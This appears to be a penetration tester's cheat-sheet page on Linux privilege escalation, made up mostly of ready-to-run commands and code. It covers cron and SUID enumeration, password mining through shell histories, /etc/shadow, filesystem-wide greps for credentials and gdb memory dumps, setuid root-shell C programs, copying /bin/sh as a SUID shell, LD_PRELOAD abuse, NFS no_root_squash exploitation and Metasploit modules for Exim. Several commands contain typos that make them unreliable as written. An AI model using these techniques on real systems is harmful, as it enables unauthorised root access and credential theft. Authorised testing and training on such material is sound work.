Skip to main content

Privilege Escalation

Enumeration​

info

Check the enumeration phase.

Metasploit​

post/multi/recon/local_exploit_suggester

Crontab​

info

System-level file location: /etc/crontabs

$PATH redefinition files found in left-most defined path will take presidence in the search-order

File overwrite / file missing

```bash
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Spot ponctual processes

#!/bin/bash

IFS=$'\n'

old_process=$(ps -eo command)

while true; do
  new_process=$(ps -eo command)
  diff <(echo "$old_process") <(echo "$new_process")
  sleep 1
  old_process=$new_process
done

Tricks​

su root (creds reuse)
sudo -u <user> bash -i
ls -lahR /home
strace <strace <executable_file> 2>&1 | grep -i -E "open|access|no such file">
DLL to compile

so.c

Startup scripts​

find / -perm -o+w -type f 2>/dev/null | grep -v '/proc\|/dev'

Rights on files​

find / -perm -1000 -type d 2>/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -777 -type f 2>/dev/null    # Open permissions

Writable files for user or group

find / perm /u=w -user `whoami` 2>/dev/null
find / -perm /u+w,g+w -f -user `whoami` 2>/dev/null
find / -perm /u+w -user `whoami` 2>/dev/nul

Writable directories for user or group

find / perm /u=w -type -d -user `whoami` 2>/dev/null
find / -perm /u+w,g+w -d -user `whoami` 2>/dev/null

Password Mining​

history
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
ls -l /etc/passwd
ls -l /etc/shadow
grep -RiIn passw / 2>/dev/null
grep -rnw '/' -ie 'pass' --color=always 2>/dev/null | grep -vi binary
grep -rnw '/' -ie 'DB_PASS' --color=always 2>/dev/null | grep -vi binary
grep -rnw '/' -ie 'DB_PASSWORD' --color=always 2>/dev/null | grep -vi binary
grep -rnw '/' -ie 'DB_USER' --color=always 2>/dev/null | grep -vi binary
gdb -p <pid>
info proc mappings
dump memory <out_file> <start_mem_region> <stop_mem_region>

LD_PRELOAD / LD_LIBRARY_PATH​

Detection

sudo -l

Exploitation

1) Set LD_PRELOAD to point to the .so file
2) sudo LD_PRELOAD=<full_path_to_so_file> <program>
C file to compile in .so

preload.c

SetUID​

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
  setuid(0); setgid(0); system("/bin/bash");
}
#include <stdio.h>
#include <unistd.h>
main()
{
  setuid(0);
  execl("/bin/sh","sh",0);
}
gcc -o root root.c
chown root:root && chmod 4777 /var/tmp/root
cp /bin/sh /tmp/root_shell; chmod a+s /tmp/root_shell;
/tmp/root_shell -p

Specifics vulnerabilities​

Dirty c0w​

Sudo on apache2​

apache2 -f /etc/shadow

MySQL​

Exim​

Detection

dpkg -l | grep -i exim (<4.86.2)
exim -bV -v | grep -i perl (perl compiled)
head /etc/exim.conf (perl_startup option)

Exploitation

exploit/unix/local/exim_perl_startup

CVE-2016-1247​

Detection

dpkg -l

Exploit

https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html

NFS​

Detection

cat /etc/exports => looking for no_root_squash
add no_root_squash if write perm

Exploitation

1) Mount the nfs export to the local linux system
2) As root (on the localhost), compile an executable and place it in the mounted directory
3) Set 'suid' permissions to the executable
4) Run the file on the NFS server
showmount -e <ip>
chown root:root sid-shell; chmod +s sid-shell

Ressources and Tools​